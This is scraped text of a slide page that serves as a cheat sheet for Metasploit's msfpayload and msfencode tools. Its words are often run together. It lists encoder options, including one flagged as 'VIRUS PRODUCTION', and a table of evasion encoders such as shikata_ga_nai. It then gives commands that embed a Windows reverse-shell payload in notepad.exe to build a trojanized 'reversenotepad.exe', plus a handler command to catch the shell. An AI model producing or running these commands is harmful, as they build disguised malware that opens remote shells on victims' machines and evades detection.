If you can't read please download the document
Upload
cesena-security
View
12.544
Download
5
Embed Size (px)
DESCRIPTION
a little list of useful msfpayload/msfencoder commands
Citation preview
2. -i Encode the contents of the supplied file path -k Keep template working; run payload in new thread (use with-x)-lList available encoders-m Specifies an additional module search path-nDump encoder information-o The output file-p The platform to encode for-s The maximum size of the encoded data-t The output format:raw,ruby,rb,perl,pl,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vbs,loop-vbs,asp,war-vIncrease verbosity-x Specify an alternate executable template!!!VIRUS PRODUCTION !!!SUPPORTED ENCODERS:Name RankDescription---- ---------------cmd/generic_sh goodGeneric Shell Variable SubstitutionCommandcmd/ifslow Generic ${IFS} Substitution CommandEncodercmd/printf_php_mqmanualprintf(1) via PHP magic_quotesUtility Commandgeneric/none normalThe "none" Encodermipsbe/longxor normalXOR Encodermipsle/longxor normalXOR Encoderphp/base64 great PHP Base64 encoderppc/longxornormalPPC LongXOR Encoderppc/longxor_tagnormalPPC LongXOR Encodersparc/longxor_tagnormalSPARC DWORD XOR Encoderx64/xornormalXOR Encoderx86/alpha_mixedlow Alpha2 Alphanumeric MixedcaseEncoderx86/alpha_upperlow Alpha2 Alphanumeric UppercaseEncoderx86/avoid_utf8_tolower manualAvoid UTF8/tolowerx86/call4_dword_xornormalCall+4 Dword XOR Encoderx86/context_cpuidmanualCPUID-based Context Keyed PayloadEncoderx86/context_stat manualstat(2)-based Context Keyed PayloadEncoderx86/context_time manualtime(2)-based Context Keyed PayloadEncoderx86/countdownnormalSingle-byte XOR Countdown Encoderx86/fnstenv_movnormalVariable-length Fnstenv/mov DwordXOR Encoderx86/jmp_call_additivenormalJump/Call XOR Additive FeedbackEncoderx86/nonalpha low Non-Alpha Encoderx86/nonupper low Non-Upper Encoderx86/shikata_ga_nai excellent Polymorphic XOR Additive FeedbackEncoderx86/single_static_bitmanualSingle Static Bitx86/unicode_mixedmanualAlpha2 Alphanumeric UnicodeMixedcase Encoderx86/unicode_uppermanualAlpha2 Alphanumeric UnicodeUppercase Encoder 3. EXAMPLES: msfencode -e x86/alpha_mixedmsfpayload windows/shell/reverse_tcp LHOST=127.0.0.1 R | msfencode -xnotepad.exe -t exe -e x86/shikata_ga_nai -o reversenotepad.exe EXPLOIT SESSION HANDLER:msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcpLHOST=127.0.0.1 E